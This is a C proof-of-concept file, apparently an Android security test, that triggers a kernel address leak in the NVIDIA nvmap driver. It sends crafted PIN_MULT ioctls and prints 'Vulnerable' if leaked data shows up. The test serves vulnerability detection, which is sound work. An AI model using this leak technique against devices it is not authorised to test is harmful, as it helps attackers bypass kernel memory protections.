| /* |
| * Copyright (C) 2017 The Android Open Source Project |
| * |
| * Licensed under the Apache License, Version 2.0 (the "License"); |
| * you may not use this file except in compliance with the License. |
| * You may obtain a copy of the License at |
| * |
| * http://www.apache.org/licenses/LICENSE-2.0 |
| * |
| * Unless required by applicable law or agreed to in writing, software |
| * distributed under the License is distributed on an "AS IS" BASIS, |
| * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| * See the License for the specific language governing permissions and |
| * limitations under the License. |
| */ |
| #define _GNU_SOURCE |
| #include <unistd.h> |
| #include <errno.h> |
| #include <stdio.h> |
| #include <dirent.h> |
| #include <string.h> |
| #include <sys/stat.h> |
| #include <sys/ioctl.h> |
| #include <stdio.h> |
| #include <string.h> |
| #include <dlfcn.h> |
| #include <sys/time.h> |
| #include <sys/mman.h> |
| #include <sys/syscall.h> |
| #include <sys/resource.h> |
| #include <fcntl.h> |
| #include <pthread.h> |
| #include <unistd.h> |
| #include <sched.h> |
| |
| |
| struct nvmap_handle_param { |
| __u32 handle; /* nvmap handle */ |
| __u32 param; /* size/align/base/heap etc. */ |
| unsigned long result; /* returns requested info*/ |
| }; |
| |
| struct nvmap_create_handle { |
| union { |
| __u32 id; /* FromId */ |
| __u32 size; /* CreateHandle */ |
| __s32 fd; /* DmaBufFd or FromFd */ |
| }; |
| __u32 handle; /* returns nvmap handle */ |
| }; |
| |
| struct nvmap_pin_handle { |
| __u32 *handles; /* array of handles to pin/unpin */ |
| unsigned long *addr; /* array of addresses to return */ |
| __u32 count; /* number of entries in handles */ |
| }; |
| |
| struct nvmap_alloc_handle { |
| __u32 handle; /* nvmap handle */ |
| __u32 heap_mask; /* heaps to allocate from */ |
| __u32 flags; /* wb/wc/uc/iwb etc. */ |
| __u32 align; /* min alignment necessary */ |
| }; |
| |
| struct nvmap_pin_handle_32 { |
| __u32 handles; /* array of handles to pin/unpin */ |
| __u32 addr; /* array of addresses to return */ |
| __u32 count; /* number of entries in handles */ |
| }; |
| |
| struct nvmap_map_caller_32 { |
| __u32 handle; /* nvmap handle */ |
| __u32 offset; /* offset into hmem; should be page-aligned */ |
| __u32 length; /* number of bytes to map */ |
| __u32 flags; /* maps as wb/iwb etc. */ |
| __u32 addr; /* user pointer*/ |
| }; |
| |
| #define NVMAP_IOC_MAGIC 'N' |
| #define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle) |
| #define NVMAP_IOC_PIN_MULT _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle) |
| #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle) |
| #define NVMAP_IOC_PIN_MULT_32 _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32) |
| #define NVMAP_IOC_MMAP_32 _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32) |
| |
| /* common carveout heaps */ |
| #define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29) |
| #define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28) |
| #define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27) |
| #define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0) |
| |
| #define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1) |
| |
| /* allocation flags */ |
| #define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0) |
| #define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0) |
| #define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0) |
| #define NVMAP_HANDLE_CACHEABLE (0x3ul << 0) |
| #define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0) |
| |
| #define NVMAP_HANDLE_SECURE (0x1ul << 2) |
| #define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3) |
| #define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4) |
| #define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5) |
| #define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6) |
| #define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7) |
| |
| |
| int g_fd = -1; |
| |
| int open_driver() { |
| char* dev_path = "/dev/nvmap"; |
| g_fd = open(dev_path, O_RDWR); |
| return g_fd; |
| } |
| |
| |
| int main(int argc, char**argv) { |
| if (open_driver() < 0) { |
| return -1; |
| } |
| |
| int i; |
| int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0); |
| memset(handles, 0x42, 0x1000); |
| for (i = 0; i < 2; ++i) { |
| struct nvmap_create_handle op = {0}; |
| op.size = 0x1000; |
| ioctl(g_fd, NVMAP_IOC_CREATE, &op); |
| handles[i] = op.handle; |
| struct nvmap_alloc_handle alloc = {0}; |
| alloc.align = 0x1000; |
| alloc.handle = op.handle; |
| alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC; |
| alloc.flags = NVMAP_HANDLE_ZEROED_PAGES; |
| ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc); |
| } |
| |
| void* leak_addr = (void*) 0x10001000; |
| void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0); |
| memset(leak_addr, 0x41, 0x1000); |
| |
| unsigned long leaked_data = 0; |
| struct nvmap_pin_handle_32 pin = {0}; |
| pin.count = 2; |
| pin.handles = (unsigned int) handles; |
| struct nvmap_pin_handle err_pin = {0}; |
| err_pin.count = 0; |
| err_pin.handles = handles; |
| err_pin.addr = leak_addr + 8; |
| |
| ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin); // construct op.addr |
| ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin); |
| |
| for (i = 0; i < 10; ++i) { |
| if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) { |
| leaked_data = (unsigned long)((int*)leak_addr) + i; |
| } |
| } |
| |
| if (leaked_data) { |
| printf("Vulnerable"); |
| } |
| return 0; |
| } |
